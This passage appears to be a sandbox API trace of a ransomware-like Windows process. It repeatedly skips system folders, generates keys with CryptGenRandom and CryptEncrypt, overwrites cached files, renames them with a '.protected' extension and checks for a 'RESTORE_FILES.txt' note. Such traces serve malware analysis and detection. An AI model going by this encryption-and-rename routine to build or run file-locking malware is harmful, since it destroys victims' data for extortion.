HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.948] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.949] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".txt") returned 0x0 [0088.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.949] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".rar") returned 0x0 [0088.949] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned 152 [0088.949] StrStrW (lpFirst="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", lpSrch=".zip") returned 0x0 [0088.949] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18a, lpOverlapped=0x0) returned 1 [0088.949] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.950] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18a, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18a, lpOverlapped=0x0) returned 1 [0088.950] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.950] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.950] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.950] CloseHandle (hObject=0x150) returned 1 [0088.950] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected") returned 162 [0088.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\3388ecc3f7bc4a9271c10ed8621e5a65_f55c512047947b70f94de5dec6d6838d.protected")) returned 1 [0088.951] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Windows") returned -1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files") returned -1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="Program Files (x86)") returned -1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="$Recycle.bin") returned 1 [0088.951] lstrcmpiW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="System Volume Information") returned -1 [0088.951] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.951] StrStrIW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".protected") returned 0x0 [0088.951] lstrcmpW (lpString1="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpString2="RESTORE_FILES.txt") returned -1 [0088.951] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.951] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.951] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.951] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".txt") returned 0x0 [0088.951] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.952] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".rar") returned 0x0 [0088.952] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned 152 [0088.952] StrStrW (lpFirst="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", lpSrch=".zip") returned 0x0 [0088.952] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.952] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.952] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x190, lpOverlapped=0x0) returned 1 [0088.953] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.953] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.953] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.953] CloseHandle (hObject=0x150) returned 1 [0088.954] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected") returned 162 [0088.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.protected")) returned 1 [0088.954] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Windows") returned -1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files") returned -1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="Program Files (x86)") returned -1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="$Recycle.bin") returned 1 [0088.954] lstrcmpiW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="System Volume Information") returned -1 [0088.954] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.954] StrStrIW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".protected") returned 0x0 [0088.955] lstrcmpW (lpString1="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpString2="RESTORE_FILES.txt") returned -1 [0088.955] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.955] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.955] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".txt") returned 0x0 [0088.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.955] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".rar") returned 0x0 [0088.955] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned 152 [0088.955] StrStrW (lpFirst="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", lpSrch=".zip") returned 0x0 [0088.955] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.956] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1ae, lpOverlapped=0x0) returned 1 [0088.956] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.956] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.956] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.956] CloseHandle (hObject=0x150) returned 1 [0088.957] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected") returned 162 [0088.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.protected")) returned 1 [0088.976] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Windows") returned -1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files") returned -1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="Program Files (x86)") returned -1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="$Recycle.bin") returned 1 [0088.976] lstrcmpiW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="System Volume Information") returned -1 [0088.976] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.976] StrStrIW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".protected") returned 0x0 [0088.976] lstrcmpW (lpString1="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpString2="RESTORE_FILES.txt") returned -1 [0088.976] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.976] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.976] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.977] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".txt") returned 0x0 [0088.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.977] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".rar") returned 0x0 [0088.977] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned 152 [0088.977] StrStrW (lpFirst="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", lpSrch=".zip") returned 0x0 [0088.977] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.978] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.978] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x194, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x194, lpOverlapped=0x0) returned 1 [0088.978] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.978] CloseHandle (hObject=0x150) returned 1 [0088.978] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected") returned 162 [0088.978] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.protected")) returned 1 [0088.979] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Windows") returned -1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files") returned -1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="Program Files (x86)") returned -1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="$Recycle.bin") returned 1 [0088.979] lstrcmpiW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="System Volume Information") returned -1 [0088.979] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.979] StrStrIW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".protected") returned 0x0 [0088.979] lstrcmpW (lpString1="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpString2="RESTORE_FILES.txt") returned -1 [0088.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.980] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".txt") returned 0x0 [0088.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 152 [0088.980] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".rar") returned 0x0 [0088.980] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 